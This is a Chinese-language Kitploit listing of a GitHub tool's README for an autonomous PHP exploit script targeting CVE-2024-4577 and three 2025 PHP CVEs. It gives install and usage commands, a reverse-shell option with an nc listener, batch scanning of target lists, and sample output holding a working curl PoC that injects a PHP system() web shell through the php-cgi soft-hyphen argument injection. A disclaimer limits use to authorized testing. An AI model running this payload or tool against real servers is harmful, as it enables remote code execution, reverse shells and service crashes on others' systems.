Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
侦察漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用信息收集渗透测试命令与控制网络爬虫远程访问工具
GitHubgl1tch0x1/php_8.1.x_exploit

PHP_8.1.x_Exploit

134个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

自动化检测与利用关键PHP漏洞(CVE-2024-4577绕过、CVE-2025-14177、CVE-2025-14180、CVE-2025-14178)

查看仓库

🚀 PHP CVE 自动驾驶仪

自动检测和利用关键 PHP 漏洞 (CVE-2024-4577 绕过, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh 是一个单文件、零配置的安全评估工具,能够自动发现易受攻击的 PHP 端点,并利用影响 PHP 8.1.34 之前版本(2024 年 12 月发布)的四个高危 CVE。它无需手工构建载荷——只需提供一个 URL,脚本会自动完成从爬取到远程代码执行的全部工作。完全自动驾驶模式——无需用户提示即可自动检测和利用。

特性

  • 完全自主的自动驾驶模式 – 给定一个 URL,自动爬取、指纹识别、测试和利用,无需用户交互。
  • 批量扫描 – 提供目标列表,并行运行。
  • 高级爬取 – 从首页提取链接和表单,提高发现能力。
  • 操作系统与 PHP 版本指纹识别 – 在 Linux 上避免 Windows 专属攻击,检查 PHP 版本。
  • CVE-2024-4577 绕过(Windows CGI 参数注入)
    • 检测并利用存在漏洞的 PHP-CGI 端点。
    • 可选反向 Shell(PowerShell 单行命令)。
    • 两种注入风格:标准 -d 和软连字符 %AD 绕过。
  • CVE-2025-14177 – 通过 getimagesize() 发生的堆内存泄露
    • 动态创建畸形 JPEG 文件,并自动提交到任何发现的上传端点。
    • 检测响应中泄露的内存。
  • 基于 RCE 的深度本地扫描(当 CVE-2024-4577 被利用时)
    • 上传轻量级 PHP 扫描器,测试以下漏洞:
      • CVE-2025-14180 – PDO PostgreSQL 中的空指针解引用。
      • CVE-2025-14178 – array_merge 中的整数溢出。
  • 智能爬取 – 提取链接和表单以发现 CGI 脚本和上传页面。
  • 并行执行 – 若可用则使用 parallel,否则优雅降级。
  • 详细与调试模式 – 查看每个 HTTP 请求和决策。
  • 报告生成 – 将发现结果保存到文本文件。
  • 干净安全 – 退出时销毁临时文件,超时防止挂起。

要求

无需 root 权限 – 该工具仅发送 HTTP 请求,并可选执行反向 Shell(需要您的机器上有监听器)。

安装

root@kitploit:~
git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

使用

单个目标(最常见)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.example.com

单个目标 + 反向 Shell(CVE-2024-4577)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

然后在您的机器上:

root@kitploit:~
nc -lvnp 4444

批量扫描多个目标

root@kitploit:~
./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

示例 targets.txt:

root@kitploit:~
http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

仅扫描模式(不尝试利用)

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

保存报告到文件

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

详细 / 调试输出

root@kitploit:~
./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # 非常嘈杂

工作原理(阶段)

命令行选项(完整参考)

涵盖的 CVE 详情

注意: CVE‑2025‑14180 和 CVE‑2025‑14178 只能从服务器内部准确检测(本地测试)。脚本通过在成功利用 CGI 后上传扫描器来实现这一点。

📸 示例输出

root@kitploit:~
[*] 扫描: http://192.168.1.100/
[*] 操作系统: windows
[*] PHP 版本: 8.1.33
[*] 测试 CVE-2024-4577 于 http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: 存在漏洞(软连字符注入)
[*] 尝试反向 Shell 到 192.168.1.5 4444
...
[*] 测试 CVE-2025-14177 通过 http://192.168.1.100/upload.php
[-] CVE-2025-14177: 检测到潜在堆泄露!
...
[*] 通过 RCE 运行深度本地扫描...
PHP_VERSION=8.1.33
CVE-2025-14180: 存在漏洞
CVE-2025-14178: 存在漏洞
CVE-2025-14177: 存在漏洞(泄露: 486561704c65616b21...)

===================== http://192.168.1.100/ 的报告 =====================
操作系统: windows
PHP: 8.1.33
CVE-2024-4577: 可利用于 http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: 存在漏洞
CVE-2025-14180/14178: 存在漏洞(请参阅深度扫描输出)
==============================================================

⚠️ 重要警告与免责声明

  • 自动驾驶模式 – 该工具会自动利用漏洞而无需提示。仅限在授权目标上使用。
  • 仅限合法使用 – 本工具旨在用于授权的安全评估、渗透测试和教育目的。未经许可使用该系统攻击他人在大多数司法管辖区是非法的。
  • 无担保 – 本软件按“现状”提供,不附带任何形式的担保。
  • 可能造成损害 – 利用漏洞可能导致服务崩溃(CVE-2025-14180)或内存损坏(CVE-2025-14178)。请勿在未经明确同意的情况下在生产系统上运行。
  • 反向 Shell – --revshell 选项会从目标向您的机器打开一个套接字。确保您拥有回连的权限。
  • 日志记录 – 您的请求将出现在目标的访问/错误日志中。请负责任地使用。

🛠️ 故障排除

🤝 贡献

欢迎提交拉取请求、错误报告和功能建议。请遵循:

  • 保持脚本单文件且纯 Bash。
  • 同时测试有 parallel 和没有 parallel 的情况。
  • 相应更新此 README。

📜 许可证

GNU 通用公共许可证 v3.0 – 请参阅 LICENSE 文件。

📚 参考

  • PHP 8.1.34 发布公告
  • CVE-2024-4577 详情 (NVD)
  • CVE-2025-14177 / 14178 / 14180 (NVD)
  • Windows 最佳匹配字符映射

为安全社区用心制作。请合乎道德地使用。

下载工具
依赖项用途通常已安装?
bash 4.0+脚本解释器是(Linux/macOS)
curlHTTP 请求是
grep, sed, awk文本处理是
mktemp创建临时文件是
(可选)parallel更快的批量扫描否(但推荐)
(可选)jqJSON 输出格式化否
阶段动作
1指纹识别 – 通过响应头和探测获取操作系统和 PHP 版本。
2爬取 – 从首页提取 href 和 action 属性。
3CGI 发现 – 尝试常见路径以及爬取到的看起来像 CGI 的链接。
4CVE‑2024‑4577 测试 – 注入 -d 和 %AD 载荷;若成功,执行命令或发送反向 Shell。
5上传端点发现 – 检查常见上传路径以及包含 "upload"/"image" 的表单。
6CVE‑2025‑14177 测试 – 构造畸形 JPEG,POST 到每个上传端点,检测堆泄露。
7深度内部扫描 – 若实现 RCE,上传扫描器 PHP 脚本并运行,测试 CVE‑2025‑14180 / CVE‑2025‑14178。
8报告 – 打印摘要并可选写入文件。
选项描述
-u URL单个目标 URL(例如 http://example.com/)
-l FILE批量文件,每行一个 URL
--scan-only仅检测 – 不利用(无反向 Shell,无载荷上传)
-o FILE将最终报告写入 FILE
--threads N批量扫描的并行线程数(默认:5)
--timeout NHTTP 超时秒数(默认:10)
--no-color禁用彩色输出
--verbose显示详细进度
--debug显示每个 HTTP 请求(可能泄露敏感数据)
--revshell IP PORT当发现 CVE‑2024‑4577 时尝试反向 Shell
-h, --help显示帮助并退出
CVE严重性影响利用载体修复版本
CVE‑2024‑4577(绕过)严重RCEWindows CGI 参数注入(软连字符映射)PHP 8.1.34
CVE‑2025‑14177中等/高信息泄露(堆内存)畸形 JPEG 传递给 getimagesize()PHP 8.1.34
CVE‑2025‑14180高拒绝服务(NULL 解引用)PDO PostgreSQL 使用模拟预处理 + 畸形参数 \x99PHP 8.1.34
CVE‑2025‑14178高(8.2)拒绝服务 / 潜在内存损坏array_merge() 处理超大数组导致整数溢出PHP 8.1.34
问题解决方案
curl: command not found安装 curl
GNU parallel not found忽略 – 脚本在无它时也能工作(批量扫描较慢)
未找到 CGI 端点目标可能未使用 CGI,或者位于阻挡 -d 标志的 WAF 之后
CVE-2024-4577 有效但反向 Shell 失败检查防火墙;尝试使用 --scan-only 进行更简单的载荷并手动使用 nc 监听器
图像泄露测试始终返回“无泄露”上传端点可能未使用 getimagesize(),或它清除了二进制数据
本地扫描器上传失败Web 根目录可能不可写;脚本会尝试在与 CGI 脚本相同的目录中写入